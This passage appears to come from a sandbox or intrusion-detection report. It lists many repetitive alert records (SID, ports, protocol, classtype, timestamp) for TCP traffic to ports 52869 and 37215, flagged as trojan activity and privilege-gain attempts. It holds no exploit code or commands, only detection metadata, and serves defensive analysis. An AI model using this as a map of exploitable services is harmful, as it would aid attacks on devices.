                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.243266
                      SID:2025132
                      Source Port:59672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:26.734319
                      SID:2027339
                      Source Port:51386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.318207
                      SID:2831300
                      Source Port:33038
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.113037
                      SID:2829579
                      Source Port:51016
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.001231
                      SID:2027339
                      Source Port:46446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.172806
                      SID:2027339
                      Source Port:35860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.638879
                      SID:2831300
                      Source Port:56182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.653586
                      SID:2835222
                      Source Port:60840
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.983105
                      SID:2829579
                      Source Port:58644
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.713934
                      SID:2027339
                      Source Port:42144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.640312
                      SID:2829579
                      Source Port:54070
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.593640
                      SID:2831300
                      Source Port:58574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.095767
                      SID:2025132
                      Source Port:35972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.175742
                      SID:2835222
                      Source Port:58932
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.982233
                      SID:2025132
                      Source Port:33924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.814790
                      SID:2027339
                      Source Port:55022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.990801
                      SID:2025132
                      Source Port:43992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.115230
                      SID:2831300
                      Source Port:60698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.798104
                      SID:2027339
                      Source Port:44152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.169961
                      SID:2831300
                      Source Port:43394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.018425
                      SID:2835222
                      Source Port:59276
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.616435
                      SID:2027339
                      Source Port:50026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.758954
                      SID:2027339
                      Source Port:60556
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.624224
                      SID:2027339
                      Source Port:60474
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.565610
                      SID:2027339
                      Source Port:60398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.422050
                      SID:2027339
                      Source Port:60960
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.644828
                      SID:2027339
                      Source Port:55828
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.626717
                      SID:2027339
                      Source Port:34632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.249042
                      SID:2831300
                      Source Port:33212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:51.152216
                      SID:2027339
                      Source Port:51020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:53.715694
                      SID:2025132
                      Source Port:38326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.311124
                      SID:2829579
                      Source Port:46666
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.512162
                      SID:2025132
                      Source Port:36844
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.204975
                      SID:2829579
                      Source Port:39976
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.562310
                      SID:2027339
                      Source Port:35350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221530
                      SID:2829579
                      Source Port:57708
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.648203
                      SID:2831300
                      Source Port:41728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.677519
                      SID:2835222
                      Source Port:40634
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222091
                      SID:2835222
                      Source Port:55906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.892361
                      SID:2025132
                      Source Port:57358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:07.942303
                      SID:2025132
                      Source Port:53118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.320338
                      SID:2027339
                      Source Port:40076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.806062
                      SID:2027339
                      Source Port:46250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.484881
                      SID:2025132
                      Source Port:59906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.370228
                      SID:2027339
                      Source Port:58642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.182734
                      SID:2025132
                      Source Port:50088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:01.256492
                      SID:2025132
                      Source Port:51580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:20.472956
                      SID:2831300
                      Source Port:56140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.887574
                      SID:2025132
                      Source Port:58218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.384793
                      SID:2025132
                      Source Port:46206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.033766
                      SID:2829579
                      Source Port:59984
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.735812
                      SID:2831300
                      Source Port:41760
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.262355
                      SID:2025132
                      Source Port:34778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.822392
                      SID:2829579
                      Source Port:46852
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:37.123706
                      SID:2025132
                      Source Port:36914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.326437
                      SID:2027339
                      Source Port:48448
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.537098
                      SID:2027339
                      Source Port:41216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.247233
                      SID:2025132
                      Source Port:53918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.228868
                      SID:2829579
                      Source Port:33362
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.190671
                      SID:2025132
                      Source Port:45934
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.110860
                      SID:2835222
                      Source Port:58438
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.798234
                      SID:2027339
                      Source Port:56576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.839991
                      SID:2027339
                      Source Port:38150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.064240
                      SID:2835222
                      Source Port:56680
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.504282
                      SID:2025132
                      Source Port:43928
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.064240
                      SID:2835222
                      Source Port:59016
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.132103
                      SID:2829579
                      Source Port:40700
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.111685
                      SID:2027339
                      Source Port:39226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.042815
                      SID:2027339
                      Source Port:51644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.266338
                      SID:2025132
                      Source Port:59852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.333805
                      SID:2027339
                      Source Port:47398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.157444
                      SID:2829579
                      Source Port:52842
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.425298
                      SID:2027339
                      Source Port:43806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.989167
                      SID:2829579
                      Source Port:46360
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.672378
                      SID:2831300
                      Source Port:40310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.650643
                      SID:2829579
                      Source Port:57514
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.903844
                      SID:2831300
                      Source Port:40620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.787786
                      SID:2027339
                      Source Port:41992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.916250
                      SID:2829579
                      Source Port:34934
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.079114
                      SID:2835222
                      Source Port:53940
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.048113
                      SID:2829579
                      Source Port:55316
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.686542
                      SID:2831300
                      Source Port:51606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.560945
                      SID:2025132
                      Source Port:43414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.039129
                      SID:2829579
                      Source Port:52762
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.005094
                      SID:2027339
                      Source Port:49358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.048618
                      SID:2835222
                      Source Port:49156
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.312311
                      SID:2027339
                      Source Port:44086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.750477
                      SID:2027339
                      Source Port:37158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.209467
                      SID:2025132
                      Source Port:43906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.944379
                      SID:2025132
                      Source Port:33872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:56.353592
                      SID:2027339
                      Source Port:46456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.033766
                      SID:2829579
                      Source Port:40060
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.494330
                      SID:2025132
                      Source Port:60812
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:21.936545
                      SID:2829579
                      Source Port:42860
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.447066
                      SID:2027339
                      Source Port:55858
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.991545
                      SID:2027339
                      Source Port:55570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.334452
                      SID:2835222
                      Source Port:51350
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.109665
                      SID:2025132
                      Source Port:40882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.296756
                      SID:2835222
                      Source Port:43348
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.884598
                      SID:2835222
                      Source Port:55218
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.683188
                      SID:2831300
                      Source Port:49128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.184421
                      SID:2835222
                      Source Port:41550
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.167781
                      SID:2025132
                      Source Port:33470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.161942
                      SID:2027339
                      Source Port:47250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221803
                      SID:2835222
                      Source Port:36746
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.064573
                      SID:2835222
                      Source Port:50696
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.131607
                      SID:2027339
                      Source Port:53892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.952783
                      SID:2829579
                      Source Port:42156
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.962388
                      SID:2025132
                      Source Port:36968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.825431
                      SID:2027339
                      Source Port:58434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.022868
                      SID:2027339
                      Source Port:34466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.022245
                      SID:2025132
                      Source Port:51378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.611556
                      SID:2027339
                      Source Port:53552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.484487
                      SID:2025132
                      Source Port:51798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.910426
                      SID:2829579
                      Source Port:50096
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.179280
                      SID:2027339
                      Source Port:39742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.321371
                      SID:2025132
                      Source Port:49116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.565131
                      SID:2027339
                      Source Port:54952
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:05.374045
                      SID:2027339
                      Source Port:54602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.263056
                      SID:2027339
                      Source Port:38236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.455724
                      SID:2027339
                      Source Port:41808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.456435
                      SID:2027339
                      Source Port:35924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.054782
                      SID:2835222
                      Source Port:58546
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.064358
                      SID:2829579
                      Source Port:41428
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.134490
                      SID:2025132
                      Source Port:34732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.349550
                      SID:2831300
                      Source Port:41078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.063023
                      SID:2027339
                      Source Port:40454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.114673
                      SID:2835222
                      Source Port:57736
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.596580
                      SID:2027339
                      Source Port:38116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.966322
                      SID:2027339
                      Source Port:48450
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.205247
                      SID:2027339
                      Source Port:39042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.943881
                      SID:2027339
                      Source Port:49940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.636425
                      SID:2835222
                      Source Port:60540
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.032492
                      SID:2829579
                      Source Port:35612
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.607815
                      SID:2027339
                      Source Port:59936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.016560
                      SID:2831300
                      Source Port:44112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:13.300689
                      SID:2027339
                      Source Port:40112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.115220
                      SID:2829579
                      Source Port:51988
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.556166
                      SID:2831300
                      Source Port:36780
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.944836
                      SID:2025132
                      Source Port:51548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.062277
                      SID:2829579
                      Source Port:53428
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.496839
                      SID:2027339
                      Source Port:52330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.113390
                      SID:2829579
                      Source Port:34024
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.039504
                      SID:2831300
                      Source Port:52804
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.914137
                      SID:2027339
                      Source Port:34970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.624686
                      SID:2027339
                      Source Port:57118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.651026
                      SID:2829579
                      Source Port:57736
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.905375
                      SID:2027339
                      Source Port:44260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.246033
                      SID:2025132
                      Source Port:56978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.381812
                      SID:2027339
                      Source Port:53042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.144379
                      SID:2027339
                      Source Port:56624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.031511
                      SID:2835222
                      Source Port:45100
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.392527
                      SID:2025132
                      Source Port:48730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.299586
                      SID:2027339
                      Source Port:47142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.613165
                      SID:2027339
                      Source Port:52470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.944679
                      SID:2829579
                      Source Port:48608
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.976649
                      SID:2829579
                      Source Port:59476
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.333866
                      SID:2025132
                      Source Port:33564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.544315
                      SID:2027339
                      Source Port:46764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.127051
                      SID:2027339
                      Source Port:60470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.043868
                      SID:2831300
                      Source Port:41608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.490945
                      SID:2025132
                      Source Port:59242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.454682
                      SID:2025132
                      Source Port:59644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:58.216922
                      SID:2831300
                      Source Port:49966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.921789
                      SID:2027339
                      Source Port:52396
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.867104
                      SID:2831300
                      Source Port:37288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.791502
                      SID:2831300
                      Source Port:55812
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.961079
                      SID:2027339
                      Source Port:50102
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.496780
                      SID:2027339
                      Source Port:55182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.481591
                      SID:2025132
                      Source Port:33528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.914137
                      SID:2831300
                      Source Port:53636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:54.567167
                      SID:2831300
                      Source Port:55626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.192052
                      SID:2835222
                      Source Port:50040
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.085571
                      SID:2831300
                      Source Port:47840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:00.552327
                      SID:2025132
                      Source Port:56838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.161892
                      SID:2835222
                      Source Port:41506
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.625100
                      SID:2831300
                      Source Port:37504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.334933
                      SID:2835222
                      Source Port:35100
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.277250
                      SID:2831300
                      Source Port:43864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.118165
                      SID:2829579
                      Source Port:35478
                      Destination Port:37215
                      Protocol:TCP
